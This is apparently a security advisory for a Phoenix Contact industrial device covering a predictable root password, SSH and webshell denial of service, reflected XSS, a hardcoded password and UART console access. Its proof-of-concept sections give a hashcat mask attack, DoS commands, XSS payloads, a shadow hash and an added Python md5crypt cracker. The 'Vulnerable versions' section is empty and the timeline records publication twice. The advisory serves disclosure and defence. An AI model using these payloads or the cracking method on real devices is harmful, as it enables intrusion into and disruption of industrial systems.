Vendor description
“Connecting, distributing, and controlling power and data flows – we have been developing the right products for this purpose since 1923. Whether in industrial production facilities, in the field of renewable energies, in infrastructure, or for complex device connections: our solutions are used wherever processes must run automatically. Above and beyond their pure function, they help our partners to develop sustainable applications with more efficient processes and reduced costs.
We are Phoenix Contact: With innovative products and solutions, we are paving the way to a climate-neutral and sustainable world.”
Source: https://www.phoenixcontact.com/en-us/company
Vulnerable versions
1) Weak/Predictable root Password (CVE-2025-41692)
The device’s root password is generated with a weak ruleset: it consists of the password set in the web interface, followed by an asterisk and an eight-digit number. An attacker who knows the administration password therefore only has to brute-force the eight digits, which takes minutes on a single GPU (seconds in the run shown below).
2) Authenticated Denial-of-Service via SSH (CVE-2025-41693)
The device is vulnerable to a denial-of-service condition when SSH is enabled. An authenticated attacker can exploit this issue to make the device unresponsive.
3) Authenticated Denial-of-Service via Webshell (CVE-2025-41694)
The webshell is vulnerable to a denial of service condition. An authenticated attacker can exploit this issue to make the webserver unresponsive.
4) Multiple Reflected Cross-Site Scripting Vulnerabilities (CVE-2025-41695, CVE-2025-41745 – CVE-2025-41752)
Multiple GET and POST parameters are reflected unescaped into the response and can be used to trigger reflected cross-site scripting. An attacker who gets an authenticated user to open a crafted link or submit a crafted form can execute script in the context of that user’s browser. Cookies may also be stolen this way.
5) Hardcoded User Password (CVE-2025-41696)
The device’s “user” account has weak hardcoded credentials. An attacker with physical access could abuse this to gain serial access.
6) Access to UART Console (CVE-2025-41697)
The device exposes a UART console on the PCB, which allows an attacker to interact with the Linux operating system. Combined with vulnerability 5), an attacker can log in to the system with the hardcoded credentials. This attack requires physical access.
Proof of Concept
1) Weak/Predictable root Password (CVE-2025-41692)
The root password is generated using the mask “<pw>*[0-9]{8}”, i.e. the web-interface password, a literal asterisk and eight decimal digits. The following hashcat configuration (hash mode 500 for md5crypt, mask attack with the known web-interface password as the fixed prefix) recovers the password if the administration credentials are known:
hashcat -m 500 -a 3 hash.txt password*?d?d?d?d?d?d?d?d --force
$1$Y8/euSU2$l42H5Fox4UvOIwt4cCyUL1:password*92016123
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 500 (md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5))
Hash.Target......: $1$Y8/euSU2$l42H5Fox4UvOIwt4cCyUL1
Time.Started.....: Mon Apr 14 13:25:20 2025, (3 secs)
Time.Estimated...: Mon Apr 14 13:25:23 2025, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: password*?d?d?d?d?d?d?d?d [17]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 121.3 kH/s (59.56ms) @ Accel:4 Loops:250 Thr:256 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 399360/100000000 (0.40%)
Rejected.........: 0/399360 (0.00%)
Restore.Point....: 368640/100000000 (0.37%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:750-1000
Candidate.Engine.: Device Generator
Candidates.#1....: password*13636123 -> password*62273232
Hardware.Mon.#1..: Temp: 69c Util:100% Core: 210MHz Mem: 405MHz Bus:16
In the run above the web-interface password was “password” and the recovered root password is “password*92016123”; with a web-interface password of “SuperStrongPassword” the root password would look like “SuperStrongPassword*92016123”. It is generated from the web-interface password plus an appended asterisk and an eight-digit number, so the strength of the web-interface password does not help once it is known. Note that the 3 seconds above are an early hit: the full keyspace is 10^8 candidates (see the Progress line), which at the ~121 kH/s shown takes about 14 minutes to exhaust on the same hardware. The password is newly generated on each start of the device, so the crack has to be repeated after a reboot.
2) Authenticated Denial-of-Service via SSH (CVE-2025-41693)
The dropbear SSH server is modified by the manufacturer. When the SSH feature is used to execute a command directly at login (ssh user@host command), the spawned pxc_cli process stays open after the command and keeps consuming CPU. After about six such connections the device becomes unresponsive, as the top output below shows (load average around 7, 0% idle, six pxc_cli -ssh processes in state R):
attacker$ ssh <known_user>@<IP> echo DOS
switch$ top
Mem: 62024K used, 62996K free, 0K shrd, 0K buff, 21576K cached
CPU: 13% usr 86% sys 0% nic 0% idle 0% io 0% irq 0% sirq
Mem: 63016K used, 62004K free, 0K shrd, 0K buff, 21576K cached
CPU: 12% usr 86% sys 0% nic 0% idle 0% io 0% irq 0% sirq
Load average: 6.97 3.47 1.44 7/190 1393
PID PPID USER STAT VSZ %VSZ CPU %CPU COMMAND
1163 1162 root R 6896 6% 0 14% /usr/bin/pxc_cli -ssh
1246 1244 root R 6896 6% 0 14% /usr/bin/pxc_cli -ssh
1294 1293 root R 6896 6% 0 14% /usr/bin/pxc_cli -ssh
1233 1232 root R 6896 6% 0 14% /usr/bin/pxc_cli -ssh
1255 1254 root R 6896 6% 0 14% /usr/bin/pxc_cli -ssh
1385 1384 root R 6892 6% 0 14% /usr/bin/pxc_cli -ssh
1121 1093 apache S 24752 20% 0 7% /usr/bin/php -c /dev/shm/php.ini
842 1 root S 877m 718% 0 6% /usr/bin/pxc_mona -o
3) Authenticated Denial-of-Service via Webshell (CVE-2025-41694)
When the webshell receives a command consisting only of whitespace, the server blocks waiting for more data, resulting in a DoS condition. The first curl call below never returns; the verbose second call shows that the request is sent but no response arrives:
$ curl "http://192.168.19.143/php/command.php?usr=admin&pwd=password&cmd=%20"
$ curl -vv "http://192.168.19.143/php/command.php?usr=admin&pwd=password&cmd=%20"
* Trying 192.168.19.143:80...
* Connected to 192.168.19.143 (192.168.19.143) port 80
> GET /php/command.php?usr=admin&pwd=password&cmd=%20 HTTP/1.1
> Host: 192.168.19.143
> User-Agent: curl/8.5.0
> Accept: */*
4) Multiple Reflected Cross-Site Scripting Vulnerabilities (CVE-2025-41695, CVE-2025-41745 – CVE-2025-41752)
The reflected cross-site scripting vulnerabilities can be triggered by using the following POST requests. Note that most of the payloads start with 1"></script>: the parameter is reflected into an inline script block, so the payload first closes that element before injecting its own. Dyn Conn Example (CVE-2025-41695):
POST /php/dyn_conn.php HTTP/1.1
Host: 192.168.19.143
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=<redacted>
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
objSave=%3Cscript%3Ealert(document%2elocation)%3C/script%3E
Port Cntr Example (CVE-2025-41745):
POST /php/pxc_portCntr2.php HTTP/1.1
Host: 192.168.19.143
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=<redacted>
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
btn_clear=1&activeTab=1"></script><script>alert(document.location)</script><script>
Port Sec Example (CVE-2025-41746):
POST /php/pxc_portSecCfg.php HTTP/1.1
Host: 192.168.19.143
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=<redacted>
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 98
portSelect=1%22%3E%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3Cscript%3E
Vlan Intf Example (CVE-2025-41747):
POST /php/pxc_vlanIntfCfg.php HTTP/1.1
Host: 192.168.19.143
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=<redacted>
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
btn_apply=1&activeInf=1%22%3E%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3Cscript%3E
GET requests for triggering XSS:
(CVE-2025-41748)
http://192.168.19.143/php/pxc_Dot1xCfg.php?port=1%22%3E%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3Cscript%3E
(CVE-2025-41749)
http://192.168.19.143/php/port_util.php?portSelect=1%22%3E%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3Cscript%3E
(CVE-2025-41750)
http://192.168.19.143/php/pxc_PortCfg.php?port=1%22%3E%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3Cscript%3E
(CVE-2025-41751)
http://192.168.19.143/php/pxc_portCntr.php?port=1%22%3E%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3Cscript%3E
(CVE-2025-41752)
http://192.168.19.143/php/pxc_portSfp.php?port=1%22%3E%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3Cscript%3E
5) Hardcoded User Password (CVE-2025-41696)
The shadow file contains the hardcoded credential of the “user” account. The md5crypt hash corresponds to the password “user”.
$ cat /etc/shadow
[...]
mailman:!!:11851:0:99999:7:::
mysql:!!:11851:0:99999:7:::
ldap:!!:11851:0:99999:7:::
pvm:!!:11851:0:99999:7:::
user:$1$pJefShJL$CoX8T20vn1g.ug0jZIczM.:11851:0:99999:7:::
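The following is an added example, not code from the advisory or the vendor; it serves both vulnerability 1) (the root password mask cracked with hashcat above) and vulnerability 5) (the “user” shadow entry). It is a pure-Python md5crypt ($1$) so that both hashes printed in this advisory can be checked offline without hashcat, plus a walk over the advisory’s mask. Assumptions: the web-interface password in the hashcat run was the literal “password” (as the cracked line shows), the mask “<pw>*” plus eight decimal digits is complete, and the hash rate used for the worst-case estimate is the 121.3 kH/s from the hashcat output. On a host with a working crypt(3) or passlib one would use that instead of re-implementing the scheme.

```python
"""
Added example (not from the advisory): FreeBSD md5crypt ($1$) in pure Python,
used to verify the two hashes in this advisory and to walk the root-password
mask <web_password>*DDDDDDDD.  Assumptions: web-interface password "password"
for the hashcat run, eight-digit suffix, 121.3 kH/s for the estimate.
"""
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(v: int, n: int) -> str:
    """md5crypt's custom base64: n characters, least significant 6 bits first."""
    out = []
    for _ in range(n):
        out.append(ITOA64[v & 0x3F])
        v >>= 6
    return "".join(out)


def md5crypt(password: bytes, salt: bytes) -> str:
    """FreeBSD md5crypt, the $1$ scheme used in the device's /etc/shadow."""
    salt = salt[:8]
    magic = b"$1$"
    ctx = hashlib.md5(password + magic + salt)
    alt = hashlib.md5(password + salt + password).digest()
    # Feed in the alternate digest, as many bytes as the password is long.
    n = len(password)
    while n > 0:
        ctx.update(alt[: min(16, n)])
        n -= 16
    # One byte per bit of the password length: NUL for 1 bits, pw[0] for 0 bits.
    n = len(password)
    while n:
        ctx.update(b"\x00" if n & 1 else password[:1])
        n >>= 1
    final = ctx.digest()
    # 1000 rounds of deliberately irregular key stretching.
    for i in range(1000):
        c = hashlib.md5()
        c.update(password if i & 1 else final)
        if i % 3:
            c.update(salt)
        if i % 7:
            c.update(password)
        c.update(final if i & 1 else password)
        final = c.digest()
    enc = ""
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        enc += _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
    enc += _to64(final[11], 2)
    return (magic + salt).decode() + "$" + enc


def split_hash(shadow_hash: str):
    """'$1$<salt>$<digest>' -> (salt bytes, digest string)."""
    _, _, salt, digest = shadow_hash.split("$")
    return salt.encode(), digest


def verify(password: str, shadow_hash: str) -> bool:
    salt, _ = split_hash(shadow_hash)
    return md5crypt(password.encode(), salt) == shadow_hash


def search_mask(shadow_hash: str, web_password: str, start: int = 0, stop: int = 10**8):
    """Walk the advisory's mask <web_password>*DDDDDDDD over [start, stop).
    The full range is 10^8 candidates; pure Python is far too slow for that,
    which is exactly why the advisory uses hashcat for it."""
    salt, _ = split_hash(shadow_hash)
    for n in range(start, stop):
        cand = f"{web_password}*{n:08d}"
        if md5crypt(cand.encode(), salt) == shadow_hash:
            return cand
    return None


def worst_case_seconds(rate_hps: float, digits: int = 8) -> float:
    """Time to exhaust the digit suffix at a given hash rate."""
    return 10**digits / rate_hps


if __name__ == "__main__":
    ROOT_HASH = "$1$Y8/euSU2$l42H5Fox4UvOIwt4cCyUL1"   # from the hashcat run above
    USER_HASH = "$1$pJefShJL$CoX8T20vn1g.ug0jZIczM."   # from /etc/shadow above
    print("root:", verify("password*92016123", ROOT_HASH))
    print("user:", verify("user", USER_HASH))
    print("worst case at 121.3 kH/s: %.0f s" % worst_case_seconds(121300))
```

Because the salt and the digit count are fixed by the device, the only secret in the root password beyond the already-known web-interface password is the eight-digit suffix; the worst-case figure is what an attacker with the hashcat setup from the advisory has to budget for, and it shrinks linearly with more GPUs.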
6) Access to UART Console (CVE-2025-41697)
Two vias next to the “LC125A Quadruple Bus Buffer Gate” on an edge of the PCB expose the UART RxD and TxD pins. They can be interfaced with a UART-to-USB converter via its RxD and TxD pins (crossed, i.e. the device’s TxD to the converter’s RxD and vice versa). The required settings are 38400 baud, 8N1 (8 data bits, no parity, 1 stop bit), at 3.3 V logic level.
Solution
Update to the latest available firmware (3.50 and newer).
Workaround
Restrict network access to the device.
Recommendation
Apply patches immediately.
Conducted in Collaboration
This research was conducted in cooperation with VERBUND OT Cyber Security Lab during a penetration test.
Contact Timeline
- 2025-07-17: Sent advisory to Phoenix Contact PSIRT.
- 2025-07-29: Vendor asked for a call to clarify the vulnerabilities.
- 2025-07-31: Aligned on timeline for September during call.
- 2025-08-19: Vendor confirmed publication for 2025-10-14; the shift was confirmed.
- 2025-09-25: Asked the vendor for another call to clarify details regarding all affected devices (including other advisories).
- 2025-09-26: Talked to vendor to clarify details.
- 2025-10-09: Asked for CVE Numbers. Received and included them in the advisory.
- 2025-10-14: Coordinated publication of security advisory.
- 2025-11-18: Phone call with Phoenix Contact; shifted publishing date to 2025-12-09 due to discussions with CERT@VDE regarding the risk rating.
- 2025-12-09: Received CVE numbers for XSS vulnerabilities from Phoenix Contact.
- 2025-12-15: Coordinated release of security advisory.